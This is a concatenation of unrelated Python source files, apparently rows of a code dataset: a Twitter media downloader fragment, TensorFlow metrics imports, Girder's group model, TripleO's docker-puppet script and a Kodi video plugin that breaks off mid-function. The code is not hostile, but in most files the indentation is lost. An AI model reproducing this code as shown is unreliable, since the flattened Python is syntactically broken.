res = json.loads(res_raw)
if not res['has_more_items']:
break
for tweet in re.findall("twitter.com/(.+)/status/([0-9]+)", res['items_html']):
ids.append(int(tweet[1]))
max_id = int(res['max_id'])
return list(set(ids))
def get_image_url(self, tweet_id):
lst = []
        if self.remaining is None or self.remaining % 10 == 0 or self.remaining <= 1:
self.check_limit()
r = self.t.statuses.show(_id=tweet_id, _method='GET')
self.remaining -= 1
print('{:d}\t{:d}\t{:s}'.format(tweet_id, self.get_unix_epoch(r['created_at']), r['text']))
for m in r['entities']['media']:
lst.append(m['media_url'] + ':orig')
return lst
def check_limit(self):
r = self.t.application.rate_limit_status(_method='GET')['resources']['statuses']['/statuses/show/:id']
self.remaining = r['remaining']
print("API Limit : {:d} / {:d} = {:f}".format(r['remaining'], r['limit'], r['remaining'] / r['limit']),
file=sys.stderr)
if r['remaining'] / r['limit'] < 0.10:
reset = r['reset'] - time.time()
print("Please wait... {:f}".format(reset), file=sys.stderr)
time.sleep(reset + 10)
@staticmethod
def get_file_extension(binary):
mime = magic.from_buffer(binary, True).decode()
return mime.split('/')[1]
@staticmethod
def get_unix_epoch(created_at):
return int(time.mktime(time.strptime(created_at, "%a %b %d %H:%M:%S +0000 %Y")))
if __name__ == '__main__':
for i in range(1, len(sys.argv)):
tw = TwitterMediaDL()
for tweetID in tw.get_medias(sys.argv[i]):
list_url = tw.get_image_url(tweetID)
for j in range(0, len(list_url)):
raw = tw.http_wrapper(list_url[j])
ext = tw.get_file_extension(raw)
with open('{:d}_{:d}.{:s}'.format(tweetID, j, ext), 'wb') as f:
f.write(raw)
| 2.75 | 3 |
tensorflow/contrib/metrics/__init__.py | DEVESHTARASIA/tensorflow | 384 | 4925 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for evaluation metrics and summary statistics.
See the @{$python/contrib.metrics} guide.
@@streaming_accuracy
@@streaming_mean
@@streaming_recall
@@streaming_recall_at_thresholds
@@streaming_precision
@@streaming_precision_at_thresholds
@@streaming_auc
@@streaming_curve_points
@@streaming_recall_at_k
@@streaming_mean_absolute_error
@@streaming_mean_iou
@@streaming_mean_relative_error
@@streaming_mean_squared_error
@@streaming_mean_tensor
@@streaming_root_mean_squared_error
@@streaming_covariance
@@streaming_pearson_correlation
@@streaming_mean_cosine_distance
@@streaming_percentage_less
@@streaming_sensitivity_at_specificity
@@streaming_sparse_average_precision_at_k
@@streaming_sparse_average_precision_at_top_k
@@streaming_sparse_precision_at_k
@@streaming_sparse_precision_at_top_k
@@streaming_sparse_recall_at_k
@@streaming_specificity_at_sensitivity
@@streaming_concat
@@streaming_false_negatives
@@streaming_false_negatives_at_thresholds
@@streaming_false_positives
@@streaming_false_positives_at_thresholds
@@streaming_true_negatives
@@streaming_true_negatives_at_thresholds
@@streaming_true_positives
@@streaming_true_positives_at_thresholds
@@auc_using_histogram
@@accuracy
@@aggregate_metrics
@@aggregate_metric_map
@@confusion_matrix
@@set_difference
@@set_intersection
@@set_size
@@set_union
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import
from tensorflow.contrib.metrics.python.metrics import *
# pylint: enable=wildcard-import
from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix
from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.set_ops import set_difference
from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection
from tensorflow.contrib.metrics.python.ops.set_ops import set_size
from tensorflow.contrib.metrics.python.ops.set_ops import set_union
# pylint: enable=unused-import,line-too-long
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| 1.546875 | 2 |
girder/models/group.py | scottwittenburg/girder | 0 | 4926 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import datetime
from .model_base import AccessControlledModel,\
ValidationException,\
AccessException
from girder.constants import AccessType
class Group(AccessControlledModel):
"""
Groups are simply groups of users. The primary use of grouping users is
to simplify access control for resources in the system, but they can
be used for other purposes that require groupings of users as well.
Group membership is stored in the database on the user document only;
there is no "users" field in this model. This is to optimize for the most
common use case for querying membership, which involves checking access
control policies, which is always done relative to a specific user. The
task of querying all members within a group is much less common and
    typically only performed on a single group at a time, so doing a find on the
indexed group list in the user collection is sufficiently fast.
Users with READ access on the group can see the group and its members.
Users with WRITE access on the group can add and remove members and
change the name or description.
Users with ADMIN access can delete the entire group.
"""
def initialize(self):
self.name = 'group'
self.ensureIndices(['lowerName'])
self.ensureTextIndex({
'name': 10,
'description': 1
})
def validate(self, doc):
doc['name'] = doc['name'].strip()
doc['lowerName'] = doc['name'].lower()
doc['description'] = doc['description'].strip()
if not doc['name']:
raise ValidationException('Group name must not be empty.', 'name')
q = {
'lowerName': doc['lowerName'],
}
if '_id' in doc:
q['_id'] = {'$ne': doc['_id']}
duplicates = self.find(q, limit=1, fields=['_id'])
if duplicates.count() != 0:
            raise ValidationException('A group with that name already '
                                      'exists.', 'name')
return doc
def list(self, user=None, limit=50, offset=0, sort=None):
"""
Search for groups or simply list all visible groups.
:param user: The user to search as.
:param limit: Result set size limit.
:param offset: Offset into the results.
:param sort: The sort direction.
"""
# Perform the find; we'll do access-based filtering of the result
# set afterward.
cursor = self.find({}, limit=0, sort=sort)
for r in self.filterResultsByPermission(cursor=cursor, user=user,
level=AccessType.READ,
limit=limit, offset=offset):
yield r
def remove(self, group):
"""
Delete a group, and all references to it in the database.
:param group: The group document to delete.
:type group: dict
"""
# Remove references to this group from user group membership lists
self.model('user').update({
'groups': group['_id']
}, {
'$pull': {'groups': group['_id']}
})
acQuery = {
'access.groups.id': group['_id']
}
acUpdate = {
'$pull': {
'access.groups': {'id': group['_id']}
}
}
# Remove references to this group from access-controlled collections.
self.update(acQuery, acUpdate)
self.model('collection').update(acQuery, acUpdate)
self.model('folder').update(acQuery, acUpdate)
self.model('user').update(acQuery, acUpdate)
# Finally, delete the document itself
AccessControlledModel.remove(self, group)
def getMembers(self, group, offset=0, limit=50, sort=None):
"""
Return the list of all users who belong to this group.
:param group: The group to list members on.
:param offset: Offset into the result set of users.
:param limit: Result set size limit.
:param sort: Sort parameter for the find query.
:returns: List of user documents.
"""
q = {
'groups': group['_id']
}
cursor = self.model('user').find(
q, offset=offset, limit=limit, sort=sort)
users = []
for user in cursor:
users.append(user)
return users
def addUser(self, group, user, level=AccessType.READ):
"""
Add the user to the group. Records membership in the group in the
user document, and also grants the specified access level on the
group itself to the user. Any group member has at least read access on
the group.
"""
if not 'groups' in user:
user['groups'] = []
if not group['_id'] in user['groups']:
user['groups'].append(group['_id'])
self.model('user').save(user, validate=False)
self.setUserAccess(group, user, level, save=True)
return group
def joinGroup(self, group, user):
"""
Call this when the user accepts an invitation.
"""
if not 'groupInvites' in user:
user['groupInvites'] = []
for invite in user['groupInvites']:
if invite['groupId'] == group['_id']:
self.addUser(group, user, level=invite['level'])
user['groupInvites'].remove(invite)
self.model('user').save(user, validate=False)
break
else:
raise AccessException('User was not invited to this group.')
return group
def inviteUser(self, group, user, level=AccessType.READ):
"""
Invite a user to join the group. Inviting them automatically
grants the user read access to the group so that they can see it.
Once they accept the invitation, they will be given the specified level
of access.
"""
# User has to be able to see the group to join it
self.setUserAccess(group, user, AccessType.READ, save=True)
if group['_id'] in user.get('groups', []):
raise ValidationException('User is already in this group.')
if not 'groupInvites' in user:
user['groupInvites'] = []
for invite in user['groupInvites']:
if invite['groupId'] == group['_id']:
invite['level'] = level
break
else:
user['groupInvites'].append({
'groupId': group['_id'],
'level': level
})
return self.model('user').save(user, validate=False)
def removeUser(self, group, user):
"""
Remove the user from the group.
"""
# Remove group membership for this user.
if 'groups' in user and group['_id'] in user['groups']:
user['groups'].remove(group['_id'])
self.model('user').save(user, validate=False)
# Remove all group access for this user on this group.
self.setUserAccess(group, user, level=None, save=True)
return group
def createGroup(self, name, creator, description='', public=True):
"""
Create a new group. The creator will be given admin access to it.
:param name: The name of the folder.
:type name: str
:param description: Description for the folder.
:type description: str
:param public: Whether the group is publicly visible.
:type public: bool
:param creator: User document representing the creator of the group.
:type creator: dict
:returns: The group document that was created.
"""
assert type(public) is bool
now = datetime.datetime.now()
group = {
'name': name,
'description': description,
'created': now,
'updated': now
}
self.setPublic(group, public=public)
# Now validate and save the group
self.save(group)
# We make the creator a member of this group and also grant them
# admin access over the group.
self.addUser(group, creator, level=AccessType.ADMIN)
return group
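    # Hedged usage sketch (variable names are illustrative; assumes the girder
    # model loader is available, e.g. from a REST resource or another model):
    #
    #   group_model = self.model('group')
    #   group = group_model.createGroup('devs', creator=admin_user, public=False)
    #   group_model.inviteUser(group, other_user, level=AccessType.WRITE)
    #   group_model.joinGroup(group, other_user)  # once the invite is accepted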
| 1.859375 | 2 |
docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 0 | 4927 | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Shell script tool to run puppet inside of the given docker container image.
# Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON
# array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings
# that can be used to generate config files or run ad-hoc puppet modules
# inside of a container.
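#
# A hypothetical single entry (illustrative only, not generated from a real
# template) looks like:
#   [
#     ["heat_api", "heat_config,file,concat",
#      "include ::tripleo::profile::base::heat::api",
#      "tripleoupstream/centos-binary-heat-api:latest", []]
#   ]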
import glob
import json
import logging
import os
import sys
import subprocess
import sys
import tempfile
import multiprocessing
log = logging.getLogger()
ch = logging.StreamHandler(sys.stdout)
if os.environ.get('DEBUG', False):
log.setLevel(logging.DEBUG)
ch.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
# this is to match what we do in deployed-server
def short_hostname():
subproc = subprocess.Popen(['hostname', '-s'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
return cmd_stdout.rstrip()
def pull_image(name):
log.info('Pulling image: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'pull', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
def match_config_volume(prefix, config):
# Match the mounted config volume - we can't just use the
# key as e.g "novacomute" consumes config-data/nova
volumes = config.get('volumes', [])
config_volume=None
for v in volumes:
if v.startswith(prefix):
config_volume = os.path.relpath(
v.split(":")[0], prefix).split("/")[0]
break
return config_volume
def get_config_hash(prefix, config_volume):
hashfile = os.path.join(prefix, "%s.md5sum" % config_volume)
hash_data = None
if os.path.isfile(hashfile):
with open(hashfile) as f:
hash_data = f.read().rstrip()
return hash_data
def rm_container(name):
if os.environ.get('SHOW_DIFF', None):
log.info('Diffing container: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'diff', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
log.info('Removing container: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'rm', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr and \
cmd_stderr != 'Error response from daemon: ' \
'No such container: {}\n'.format(name):
log.debug(cmd_stderr)
process_count = int(os.environ.get('PROCESS_COUNT',
multiprocessing.cpu_count()))
log.info('Running docker-puppet')
config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json')
log.debug('CONFIG: %s' % config_file)
with open(config_file) as f:
json_data = json.load(f)
# To save time we support configuring 'shared' services at the same
# time. For example configuring all of the heat services
# in a single container pass makes sense and will save some time.
# To support this we merge shared settings together here.
#
# We key off of config_volume as this should be the same for a
# given group of services. We are also now specifying the container
# in which the services should be configured. This should match
# in all instances where the volume name is also the same.
configs = {}
for service in (json_data or []):
if service is None:
continue
if isinstance(service, dict):
service = [
service.get('config_volume'),
service.get('puppet_tags'),
service.get('step_config'),
service.get('config_image'),
service.get('volumes', []),
]
config_volume = service[0] or ''
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if not manifest or not config_image:
continue
log.info('config_volume %s' % config_volume)
log.info('puppet_tags %s' % puppet_tags)
log.info('manifest %s' % manifest)
log.info('config_image %s' % config_image)
log.info('volumes %s' % volumes)
# We key off of config volume for all configs.
if config_volume in configs:
# Append puppet tags and manifest.
log.info("Existing service, appending puppet tags and manifest")
if puppet_tags:
configs[config_volume][1] = '%s,%s' % (configs[config_volume][1],
puppet_tags)
if manifest:
configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2],
manifest)
if configs[config_volume][3] != config_image:
log.warn("Config containers do not match even though"
" shared volumes are the same!")
else:
log.info("Adding new service")
configs[config_volume] = service
log.info('Service compilation completed.')
def mp_puppet_config((config_volume, puppet_tags, manifest, config_image, volumes)):
log.debug('config_volume %s' % config_volume)
log.debug('puppet_tags %s' % puppet_tags)
log.debug('manifest %s' % manifest)
log.debug('config_image %s' % config_image)
log.debug('volumes %s' % volumes)
sh_script = '/var/lib/docker-puppet/docker-puppet.sh'
with open(sh_script, 'w') as script_file:
os.chmod(script_file.name, 0755)
script_file.write("""#!/bin/bash
set -ex
mkdir -p /etc/puppet
cp -a /tmp/puppet-etc/* /etc/puppet
rm -Rf /etc/puppet/ssl # not in use and causes permission errors
echo "{\\"step\\": $STEP}" > /etc/puppet/hieradata/docker.json
TAGS=""
if [ -n "$PUPPET_TAGS" ]; then
TAGS="--tags \"$PUPPET_TAGS\""
fi
# workaround LP1696283
mkdir -p /etc/ssh
touch /etc/ssh/ssh_known_hosts
FACTER_hostname=$HOSTNAME FACTER_uuid=docker /usr/bin/puppet apply --verbose $TAGS /etc/config.pp
# Disables archiving
if [ -z "$NO_ARCHIVE" ]; then
archivedirs=("/etc" "/root" "/var/lib/ironic/tftpboot" "/var/lib/ironic/httpboot" "/var/www")
rsync_srcs=""
for d in "${archivedirs[@]}"; do
if [ -d "$d" ]; then
rsync_srcs+=" $d"
fi
done
rsync -a -R --delay-updates --delete-after $rsync_srcs /var/lib/config-data/${NAME}
# Also make a copy of files modified during puppet run
# This is useful for debugging
mkdir -p /var/lib/config-data/puppet-generated/${NAME}
rsync -a -R -0 --delay-updates --delete-after \
--files-from=<(find $rsync_srcs -newer /etc/ssh/ssh_known_hosts -print0) \
/ /var/lib/config-data/puppet-generated/${NAME}
# Write a checksum of the config-data dir, this is used as a
# salt to trigger container restart when the config changes
tar -c -f - /var/lib/config-data/${NAME} --mtime='1970-01-01' | md5sum | awk '{print $1}' > /var/lib/config-data/${NAME}.md5sum
fi
""")
with tempfile.NamedTemporaryFile() as tmp_man:
with open(tmp_man.name, 'w') as man_file:
man_file.write('include ::tripleo::packages\n')
man_file.write(manifest)
rm_container('docker-puppet-%s' % config_volume)
pull_image(config_image)
dcmd = ['/usr/bin/docker', 'run',
'--user', 'root',
'--name', 'docker-puppet-%s' % config_volume,
'--env', 'PUPPET_TAGS=%s' % puppet_tags,
'--env', 'NAME=%s' % config_volume,
'--env', 'HOSTNAME=%s' % short_hostname(),
'--env', 'NO_ARCHIVE=%s' % os.environ.get('NO_ARCHIVE', ''),
'--env', 'STEP=%s' % os.environ.get('STEP', '6'),
'--volume', '%s:/etc/config.pp:ro' % tmp_man.name,
'--volume', '/etc/puppet/:/tmp/puppet-etc/:ro',
'--volume', '/usr/share/openstack-puppet/modules/:/usr/share/openstack-puppet/modules/:ro',
'--volume', '/var/lib/config-data/:/var/lib/config-data/:rw',
'--volume', 'tripleo_logs:/var/log/tripleo/',
# OpenSSL trusted CA injection
'--volume', '/etc/pki/ca-trust/extracted:/etc/pki/ca-trust/extracted:ro',
'--volume', '/etc/pki/tls/certs/ca-bundle.crt:/etc/pki/tls/certs/ca-bundle.crt:ro',
'--volume', '/etc/pki/tls/certs/ca-bundle.trust.crt:/etc/pki/tls/certs/ca-bundle.trust.crt:ro',
'--volume', '/etc/pki/tls/cert.pem:/etc/pki/tls/cert.pem:ro',
# script injection
'--volume', '%s:%s:rw' % (sh_script, sh_script) ]
for volume in volumes:
if volume:
dcmd.extend(['--volume', volume])
dcmd.extend(['--entrypoint', sh_script])
env = {}
# NOTE(flaper87): Always copy the DOCKER_* environment variables as
# they contain the access data for the docker daemon.
for k in filter(lambda k: k.startswith('DOCKER'), os.environ.keys()):
env[k] = os.environ.get(k)
if os.environ.get('NET_HOST', 'false') == 'true':
log.debug('NET_HOST enabled')
dcmd.extend(['--net', 'host', '--volume',
'/etc/hosts:/etc/hosts:ro'])
dcmd.append(config_image)
log.debug('Running docker command: %s' % ' '.join(dcmd))
subproc = subprocess.Popen(dcmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env=env)
cmd_stdout, cmd_stderr = subproc.communicate()
if subproc.returncode != 0:
log.error('Failed running docker-puppet.py for %s' % config_volume)
if cmd_stdout:
log.error(cmd_stdout)
if cmd_stderr:
log.error(cmd_stderr)
else:
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
# only delete successful runs, for debugging
rm_container('docker-puppet-%s' % config_volume)
return subproc.returncode
# Holds all the information for each process to consume.
# Instead of starting them all linearly we run them using a process
# pool. This creates a list of arguments for the above function
# to consume.
process_map = []
for config_volume in configs:
service = configs[config_volume]
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if puppet_tags:
puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags
else:
puppet_tags = "file,file_line,concat,augeas"
process_map.append([config_volume, puppet_tags, manifest, config_image, volumes])
for p in process_map:
log.debug('- %s' % p)
# Fire off processes to perform each configuration. Defaults
# to the number of CPUs on the system.
p = multiprocessing.Pool(process_count)
returncodes = list(p.map(mp_puppet_config, process_map))
config_volumes = [pm[0] for pm in process_map]
success = True
for returncode, config_volume in zip(returncodes, config_volumes):
if returncode != 0:
log.error('ERROR configuring %s' % config_volume)
success = False
# Update the startup configs with the config hash we generated above
config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data')
log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix)
startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs)
infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
for infile in infiles:
with open(infile) as f:
infile_data = json.load(f)
for k, v in infile_data.iteritems():
config_volume = match_config_volume(config_volume_prefix, v)
if config_volume:
config_hash = get_config_hash(config_volume_prefix, config_volume)
if config_hash:
env = v.get('environment', [])
env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash)
log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash))
infile_data[k]['environment'] = env
outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile))
with open(outfile, 'w') as out_f:
json.dump(infile_data, out_f)
if not success:
sys.exit(1)
| 2.015625 | 2 |
main.py | acitv/plugin.video.aci | 0 | 4928 | # -*- coding: utf-8 -*-
import sys
import urllib
import urlparse
# import xbmc
import xbmcgui
import xbmcplugin
import aci
# Get the plugin url in plugin:// notation.
_url = sys.argv[0]
# Get the plugin handle as an integer number.
_handle = int(sys.argv[1])
# Get an instance of ACI.
ATV = aci.ACI()
ATV.load_aci()
# Encode user agent headers for video.
user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 '
'Firefox/47.0 FirePHP/0.7.4',
                                       'X-Requested-With': 'ShockwaveFlash/22.0.0.192'
})
def get_url(**kwargs):
"""
Create a URL for calling the plugin recursively from the given set of keyword arguments.
:param kwargs: "argument=value" pairs
:type kwargs: dict
:return: plugin call URL
:rtype: str
"""
return '{0}?{1}'.format(_url, urllib.urlencode(kwargs))
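# Example (illustrative): get_url(action='listing', category='shows') returns
# something like 'plugin://plugin.video.aci/?action=listing&category=shows',
# since _url is the plugin:// base URL Kodi passes in sys.argv[0] (the exact
# plugin id shown here is assumed).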
def get_categories():
"""
Get the list of video categories.
Here you can insert some parsing code that retrieves
the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.)
from some site or server.
.. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:return: The list of video categories
:rtype: types.GeneratorType
"""
return ATV.aci.iterkeys()
def get_videos(category):
"""
Get the list of video files/streams.
Here you can insert some parsing code that retrieves
the list of video streams in the given category from some site or server.
    .. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:param category: Category name
:type category: str
:return: the list of videos in the category
:rtype: list
"""
return ATV.aci[category]
def list_categories():
"""
Create the list of video categories in the Kodi interface.
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, 'ACI')
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get video categories
categories = get_categories()
# Iterate through categories
for category in categories:
# xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE)
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=category.title())
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': "icon.png",
'icon': "icon.png",
'fanart': "icon.png"})
# Set additional info for the list item.
        # Here we use a category name for both properties for simplicity's sake.
# setInfo allows to set various information for an item.
# For available properties see the following link:
# https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14
# 'mediatype' is needed for a skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': category.title(),
'genre': category.title(),
'mediatype': 'video'})
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=listing&category=[category name]
url = get_url(action="listing", category=category)
# is_folder = True means that this item opens a sub-list of lower level items.
is_folder = True
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def list_videos(category):
"""
Create the list of playable videos in the Kodi interface.
:param category: Category name
:type category: str
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, category)
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get the list of videos in the category.
videos = get_videos(category)
# Iterate through each video.
for video_id in videos:
# Get the video item to process.
video_item = videos[video_id]
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=video_item["title"])
# Set additional info for the list item.
# 'mediatype' is needed for skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': video_item["title"],
'genre': category.title(),
'mediatype': 'video'})
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': video_item["thumbnail"],
'icon': video_item["thumbnail"],
'fanart': video_item["thumbnail"]
})
# Set 'IsPlayable' property to 'true'.
# This is mandatory for playable items!
list_item.setProperty('IsPlayable', 'true')
referer_header = urllib.urlencode({"Referer": video_item["location"]})
video_item['url'] += '|%s&%s' % (user_agent_headers, referer_header)
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=play&
# video=[video url]
url = get_url(action='play', video=video_item['url'])
# video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \
# '&streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \
# '&|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \
# 'FirePHP/0.7.4&X-Requested-With=ShockwaveFlash/22.0.0.192&Referer=' + \
# urllib.quote_plus(video['reference'])
# url = get_url(action='play', video=video_url)
# Add the list item to a virtual Kodi folder.
# is_folder = False means that this item won't open any sub-list.
is_folder = False
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def play_video(path):
"""
Play a video by the provided path.
:param path: Fully-qualified video URL
:type path: str
"""
# Create a playable item with a path to play.
play_item = xbmcgui.ListItem(path=path)
# Play with inputstream addon.
play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')
play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')
# Pass the item to the Kodi player.
xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)
def router(paramstring):
"""
Router function that calls other functions
depending on the provided paramstring
:param paramstring: URL encoded plugin paramstring
:type paramstring: str
"""
# Parse a URL-encoded paramstring to the dictionary of
# {<parameter>: <value>} elements
params = dict(urlparse.parse_qsl(paramstring))
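    # e.g. a paramstring of 'action=listing&category=shows' becomes
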